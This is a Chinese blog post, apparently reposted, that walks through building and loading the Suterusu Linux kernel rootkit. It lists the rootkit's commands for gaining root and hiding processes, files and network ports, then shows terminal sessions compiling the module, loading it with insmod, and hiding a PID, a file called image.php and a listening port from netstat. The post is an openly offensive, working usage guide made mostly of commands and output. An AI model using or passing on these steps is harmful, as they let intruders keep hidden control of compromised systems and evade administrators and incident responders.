linux、渗透测试、网络安全、CTF、windows

内核级rootkit Suterusu的安装与使用

z0nek:

下载地址:https://github.com/citypw/suterusu/
An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM
功能列表:


Get root


$ ./sock 0


Hide PID


$ ./sock 1[pid]


Unhide PID


$ ./sock 2[pid]


HideTCPv4 port


$ ./sock 3[port]


UnhideTCPv4 port


$ ./sock 4[port]


HideTCPv6 port


$ ./sock 5[port]


UnhideTCPv6 port


$ ./sock 6[port]


HideUDPv4 port


$ ./sock 7[port]


UnhideUDPv4 port


$ ./sock 8[port]


HideUDPv6 port


$ ./sock 9[port]


UnhideUDPv6 port


$ ./sock 10[port]


Hide file/directory


$ ./sock 11[name]


Unhide file/directory


$ ./sock 12[name]


在CentOS6.5 64位下测试:
1)


[root@vincent suterusu-master]# make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build //注意这里是 linux-x86_64


make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ " -C /lib/modules/2.6.32-642.1.1.el6.x86_64/build M=/tmp/suterusu-master modules


make[1]:Entering directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'


CC [M] /tmp/suterusu-master/main.o


CC [M] /tmp/suterusu-master/util.o


CC [M] /tmp/suterusu-master/module.o


LD [M] /tmp/suterusu-master/suterusu.o


Building modules, stage 2.


MODPOST 1 modules


CC /tmp/suterusu-master/suterusu.mod.o


LD [M] /tmp/suterusu-master/suterusu.ko.unsigned


NO SIGN [M] /tmp/suterusu-master/suterusu.ko


make[1]: Leaving directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'


2)


[root@vincent suterusu-master]# gcc sock.c -o sock


sock.c:在函数‘main’中:


sock.c:205:警告:隐式声明与内建函数‘strlen’不兼容


sock.c:220:警告:隐式声明与内建函数‘strlen’不兼容


3)

[root@vincent suterusu-master]# insmod suterusu.ko

隐藏进程:

[root@vincent suterusu-master]#./sock 15542Hiding PID 5542

隐藏文件:
注意文件的隐藏只是针对文件名,也就是比如你想隐藏文件x,那么所有目录下的x都会被隐藏

[root@vincent suterusu-master]#./sock 11image.phpHiding file/dir ../image.php

隐藏连接:


[root@vincent suterusu-master]# netstat -ano | grep 49745


tcp 000.0.0.0:497450.0.0.0:* LISTEN off (0.00/0/0)


[root@vincent suterusu-master]#./sock 349745HidingTCPv4 port 49745


[root@vincent suterusu-master]# netstat -ano | grep 49745


[root@vincent suterusu-master]#



评论
热度(2)
  1. redboyz0nek 转载了此文字

© redboy | Powered by LOFTER